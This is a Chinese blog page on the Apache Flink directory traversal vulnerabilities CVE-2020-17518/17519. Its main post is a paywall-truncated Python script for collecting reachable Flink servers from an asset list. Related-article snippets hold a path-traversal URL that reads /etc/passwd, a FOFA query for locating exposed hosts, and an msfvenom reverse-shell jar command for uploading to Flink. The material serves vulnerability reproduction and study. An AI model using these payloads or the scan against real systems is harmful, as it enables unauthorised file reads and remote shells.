Apache Flink 目录遍历漏洞之脚本收集可访问服务端口

最新推荐文章于 2024-07-19 14:45:22 发布
最新推荐文章于 2024-07-19 14:45:22 发布
阅读量235 收藏 1
点赞数
分类专栏: 工具使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39664643/article/details/112286264
版权
本文详细介绍了Apache Flink的CVE-2020-17518和CVE-2020-17519目录遍历漏洞,包括漏洞的原理和复现过程,重点讲解了如何检测和收集可能存在这些漏洞的服务器,并评估其可访问性。
摘要由CSDN通过智能技术生成

CVE-2020-17518/17519:Apache Flink 目录遍历漏洞

实现收集存在flink框架的服务器,并判断是否可访问

# 脚本功能:
# 从(主机资产)xxx.json中搜索使用Flink框架的服务器,提取并测试其8081端口是否开启可访问
#
import json
import requests


# flink_list = []  # 存放具有flink的服务器
# valid_flink = [] # 存放可访问的flink

 
# 搜索使用Flink框架的服务器
def search_flink():
    with open(r'D:\xxx.json', 'r') as f:
        d = json
最低0.47元/天 解锁文章
F4ke12138
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Flink目录遍历漏洞(REST API读/写远程文件)
crowsec
02-10 1432
CVE-2020-17518复现
Apache Flink目录遍历漏洞
ITgougou_的博客
01-07 325
fofa语法搜索app="Apache-Flink" poc: http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 读取成功
apache flink目录遍历漏洞(CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1311
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
Apache Flink jobmanager 目录遍历漏洞
weixin_46801402的博客
11-02 557
Apache Flink jobmanager 目录遍历漏洞
apache目录遍历漏洞利用_【漏洞通告】Apache Flink 目录遍历漏洞(CVE202017518/17519)...
weixin_34511754的博客
01-09 141
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。 Flink以数据并行和流水线方式执行任意流数据程序,流水线运行时系统可以执行批处理和流处理程序。漏洞简述近日,监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,该漏洞编号为CVE-2020-17518...
Apache Flink 未授权访问+远程代码执行.pdf
04-30
### Apache Flink 未授权访问与远程代码执行漏洞解析及防范 #### 一、漏洞概述 **Apache Flink**是一款高性能、分布式、流处理引擎,它支持事件驱动的数据流处理和批处理作业。由于其出色的性能表现,在大数据处理...
flink-1.14.4 安装包 scala 2.12
04-03
3. **配置**: 在解压后的目录中,修改 `conf/flink-conf.yaml` 文件,配置集群参数,如 JobManager 和 TaskManager 的地址、端,以及内存设置等。 4. **启动**: 使用 `bin/start-cluster.sh` 脚本启动 Flink 集群...
小镜子提升之flink2.7z
07-21
- bin:包含可执行脚本,如启动和停止Flink服务的命令。 - conf:存放配置文件,如flink-conf.yaml,可在此处设置Flink集群参数。 - lib:存放Flink运行所需的库文件。 - opt:可选的JAR包,如Hadoop兼容性模块。 - ...
什么是flink?怎么部署.pdf
04-11
### 什么是 Apache FlinkApache Flink 是一款先进的开源流处理框架,专为实时和批量数据流处理而设计。它的核心特性在于能够提供高吞吐量、低延迟以及高可靠性的数据处理服务。Flink 不仅支持事件时间处理,还...
flink集群搭建包.zip
06-14
启动Flink集群,可以使用bin目录下的`start-cluster.sh`脚本启动standalone模式,或者`start-yarn-session.sh`启动YARN模式。 对于开发者而言,理解Flink的数据模型(DataStream和DataSet)和API是非常关键的。...
遍历ip开放的端
老五的作坊
02-06 461
用于检测服务器上某个ip地址开放的端,查漏洞等。
初识Apache+Flink
ljm13485468232的博客
07-30 290
一、什么是Apache Flink Apache Flink 是一个框架和分布式处理引擎,用于在*无边界和有边界*数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。 二、Flink 架构中的重要方面 1、处理无界和有界数据 任何类型的数据都可以形成一种事件流。信用卡交易、传感器测量、机器日志、网站或移动应用程序上的用户交互记录,所有这些数据都形成一种流。 数据可以被作为 *无界* 或者 *有界* 流来处理。 (1)无界流 有定义流的开始,但没有.
Apache Flink任意jar包上传漏洞(1.9.1最新版)
cainiao17441898的博客
07-18 543
环境: Cenos7,kali 准备: 安装Apache Flink包 运行程序 cd flink-1.9.1/bin/ , ./start-cluster.sh 生成反弹的shell,jar包。 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.238.128 LPORT=4444 -f jar > hack.jar 开始 打开localhost:8081并上传jar包 开启监听 msf6 > use exploit/multi/ha
Apache Flink介绍、架构、原理以及实现
菜鸟也学大数据的博客
01-13 2925
文章目录Flink简介1.1 什么是flink1.2 flink的特点1.3 编程API二 Flink架构2.1 架构图2.2 运行组件2.3 关键词含义三 Flink原理3.1 任务3.2 任务提交流程3.3 任务提交流程(YARN版)3.4 任务执行图3.5 任务链四 Flink和其他框架对比五 Flink安装部署六 Flink第一个示例七 Flink Source数据源八 Flink Transform算子七 Flink Sink输出端九 Flink window窗十 时间语义与WaterMar
flink-基础
qq_39300291的博客
03-18 694
flink中的状态分为两种: 分组的 (调用完keyBy) Keyed State: ValueState MapState ListState 未分组的 (没有调用keyBy) Operator State: ListState BroadcastState Flink实现数据一致性的原理: 开启Checkpointing,将状态保存到StateBackend中 job设置重启策略 Source支持记录偏移量(可以重放数据) Sink支持覆盖(幂等性) ...
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 213
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
flink 目录遍历(CVE-2020-17519)
最新发布
qq_23003811的博客
07-19 100
Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接读取JobManager本地文件系统上的任何文件。
apache目录遍历漏洞利用_Apache Flink目录遍历漏洞
weixin_39836803的博客
01-14 257
CVE-2020-17518CVE-2020-17519今天嗓子有点哑没去上班在家写点复现把,这个漏洞有两个编号正确来说是有两种方式,一种是可进行目录遍历,一种是进行远程写入,都是通过REST API进行,此漏洞的影响很是广泛,此款框架核心用java和Scala编写由于时间有限直接从实战出发未能搭建详细的测试环境一切测试均在真实环境中进行所以并无远程写入的详细过程远程读取影响版本1.11.0、1....
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 432
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接读取 JobManager 本地文件系统上的任何文件。
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值